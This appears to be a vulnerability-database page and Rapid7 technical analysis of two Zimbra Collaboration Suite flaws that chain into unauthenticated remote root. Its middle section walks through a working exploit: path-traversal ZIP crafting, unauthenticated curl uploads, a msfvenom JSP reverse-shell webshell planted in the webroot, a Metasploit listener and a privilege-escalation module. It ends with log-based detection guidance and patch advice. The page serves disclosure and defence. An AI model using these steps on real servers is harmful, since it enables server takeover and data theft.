Attacker Value
Very High
(1 user assessed)
Very High
(1 user assessed)
User Interaction
Privileges Required
Attack Vector


Disclosure Date: April 21, 2022
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.


Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.

Add Assessment

Technical Analysis

This is really bad – remote root on an organization’s email server, if combined with other (currently 0-day vulnerabilities). Patch ASAP!

CVSS V3 Severity and Metrics
Base Score:
7.2 High
Impact Score:
Exploitability Score:
Attack Vector (AV):
Attack Complexity (AC):
Privileges Required (PR):
User Interaction (UI):
Scope (S):
Confidentiality (C):
Integrity (I):
Availability (A):

General Information


  • zimbra


  • collaboration 8.8.15,
  • collaboration 9.0.0

Exploited in the Wild

Reported by:

Additional Info

Technical Analysis


In late March 2022, Zimbra released versions 9.0.0 patch 24 and 8.8.15 patch 31 to address multiple vulnerabilities in Zimbra Collaboration Suite, including CVE-2022-27924 (which we wrote about previously) and CVE-2022-27925.

Originally, Zimbra called CVE-2022-27925 an authenticated path-traversal attack, where an administrative user could write files into any directory on the filesystem as the Zimbra account. Because it was originally thought to be an administrator-only attack, NVD assigned it a CVSS base score of 7.8. Later, Volexity noticed that attackers exploiting this vulnerability had found a way to bypass the administrative requirements, and wrote about it on August 10, 2022. This new authentication bypass got a new identifier – CVE-2022-37042.

By combining the original path-traversal vulnerability and new authentication bypass, attackers can remotely compromise a Zimbra Collaboration Suite system via the administrator port (by default, 7071) anonymously. Combined with a currently unpatched privilege escalation vulnerability that we recently wrote about and wrote an exploit for, these three vulnerabilities lead to remote command execution as the root user on unpatched systems.

Although the public advisories don’t mention it, according to our analysis, Zimbra Collaboration Suite Network Edition (the paid edition) is vulnerable, and the Open Source Edition (free) is not (since it does not have the vulnerable mboximport endpoint). Vulnerable versions are:

  • Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
  • Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)

These vulnerabilities (and others in Zimbra) are being targeted for widespread exploitation in the wild, and should therefore be patched or taken offline as soon as possible. If you suspect you’ve been compromised, Zimbra provides steps to rebuild your Zimbra Collaboration Suite server from scratch on the latest patch without losing data.

Technical analysis

The core issue in CVE-2022-27925 is that the /service/extension/backup/mboximport endpoint on Zimbra Collaboration Suite’s administrative port (7071 by default), which is designed to accept a .zip file import, does not validate paths and is therefore vulnerable to a path-traversal attack. A .zip file with a relative path can write anywhere on the file system. To demonstrate, we created a .zip file with a long path, then replaced that path with path traversal:

$ echo 'Hello, world!' > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
$ zip aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  adding: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (stored 0%)
$ sed -i 's|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|../../../../../../../../../../../tmp/test.txt|'

Then we upload it to the Zimbra server using cURL, passing a valid token (which, as we’ll see, is actually not required):

$ curl -X POST -k '' -b 'ZM_AUTH_TOKEN=0_530[...]b' --data-binary **[@test](/contributors/test)**.zip
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 400 Error importing mailbox for account admin on server unable to read metadata for account f4ddb29a-340f-4373-8171-c18b64c4b485</title>

We can verify it’s written to the server:

root@zimbra6:~# ls -l /tmp/test.txt
-rw-r----- 1 zimbra zimbra 14 Aug 18 22:18 /tmp/test.txt
root@zimbra6:~# cat /tmp/test.txt
Hello, world!

The more recent authentication-bypass vulnerability – CVE-2022-37042 – was simply that the authentication cookie is not actually necessary:

$ echo 'Hello, world!' > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
$ zip aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  adding: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (stored 0%)
$ sed -i 's|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|../../../../../../../../../../../tmp/test2.txt|'
$ curl -X POST -k '' --data-binary **[@test](/contributors/test)**
$ ssh root@ cat /tmp/test2.txt
Hello, world!

We can also create a JSP payload using msfvenom, then upload it to the public webroot:

$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= RHOST= -f jsp -o aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of jsp file: 1919 bytes
Saved as: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

$ zip aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
  adding: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (deflated 59%)

$ sed -i 's|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp|' 

$ curl -X POST -k '' --data-binary **[@test](/contributors/test)**

Then set up a Metasploit listener:

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on

Trigger the payload:

curl -k ''

And get the shell:

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 
[*] Sending stage (3020772 bytes) to
[*] Meterpreter session 1 opened ( -> at 2022-08-18 15:32:50 -0700

meterpreter > getuid
Server username: zimbra

And, for bonus points, use an 0-day to get root:

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 1
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit

[*] Started reverse TCP handler on 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target appears to be vulnerable.
[*] Creating exploit directory: /tmp/.pz8ORN
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.pz8ORN/.w7ryDXBV
[*] Sending stage (3020772 bytes) to
[+] Deleted /tmp/.pz8ORN
[*] Meterpreter session 2 opened ( -> at 2022-08-18 15:34:49 -0700

meterpreter > getuid
Server username: root


This vulnerability lets us overwrite an arbitrary file, so an attacker can exploit this in a variety of ways depending on their goal. The most obvious exploit route, however, is the one we demonstrated – writing a webshell to the public directory (either zimbra/ or zimbraAdmin/). Any unusual files in those folders should be suspect.

The file /opt/zimbra/log/mailbox.log logs any bad .zip file it receives with entries such as:

2022-08-18 22:27:57,060 ERROR [qtp678433396-593:https:] [] mboxmove - Auth failed
2022-08-18 22:27:57,061 INFO  [qtp678433396-593:https:] [] mboxmove - Importing mailbox for account admin overwrite=true
2022-08-18 22:27:57,062 INFO  [qtp678433396-593:https:] [] mboxmove - Importing data for admin into mailbox id 1.
2022-08-18 22:27:57,062 WARN  [qtp678433396-593:https:] [] mboxmove - IO error unable to read metadata for account f4ddb29a-340f-4373-8171-c18b64c4b485
	at com.zimbra.cs.backup.util.Utils.IOException(
	at com.zimbra.cs.backup.ZipBackupTarget$RestoreAcctSession.<init>(
	at com.zimbra.cs.backup.ZipBackupTarget.getAccountSession(


Caused by: com.zimbra.common.service.ServiceException: system failure: Unable to parse XML file /opt/zimbra/backup/tmp/mboxmove/f4ddb29a-340f-4373-8171-c18b64c4b485/meta.xml
	at com.zimbra.common.service.ServiceException.FAILURE(
	at com.zimbra.cs.backup.XmlMeta.readAccountBackup(
	at com.zimbra.cs.backup.ZipBackupTarget$RestoreAcctSession.<init>(

Any of these errors would detect an attempted attack, as well as any accesses to the /service/extension/backup/mboximport endpoint, which is not typically used:

# cat /opt/zimbra/log/access_log.2022-08-18 - - [18/Aug/2022:22:17:03 +0000] "POST HTTP/1.1" 400 387 "-" "curl/7.82.0" 2 - - [18/Aug/2022:22:17:09 +0000] "POST HTTP/1.1" 400 521 "-" "curl/7.82.0" 2 - - [18/Aug/2022:22:18:11 +0000] "POST HTTP/1.1" 400 521 "-" "curl/7.82.0" 2 - - [18/Aug/2022:22:25:32 +0000] "POST HTTP/1.1" 401 287 "-" "curl/7.82.0" 12 - - [18/Aug/2022:22:27:57 +0000] "POST HTTP/1.1" 401 287 "-" "curl/7.82.0" 12

Note that because this chain of exploits gains root access, attackers can tamper with logfiles at will.


Because this is being actively exploited, Rapid7 strongly encourages all Zimbra Collaboration Suite users to either update their Zimbra installations, or to temporarily take them offline until they can be updated. If you suspect you’ve been compromised, you should rebuild your Zimbra server instead of trying to recover.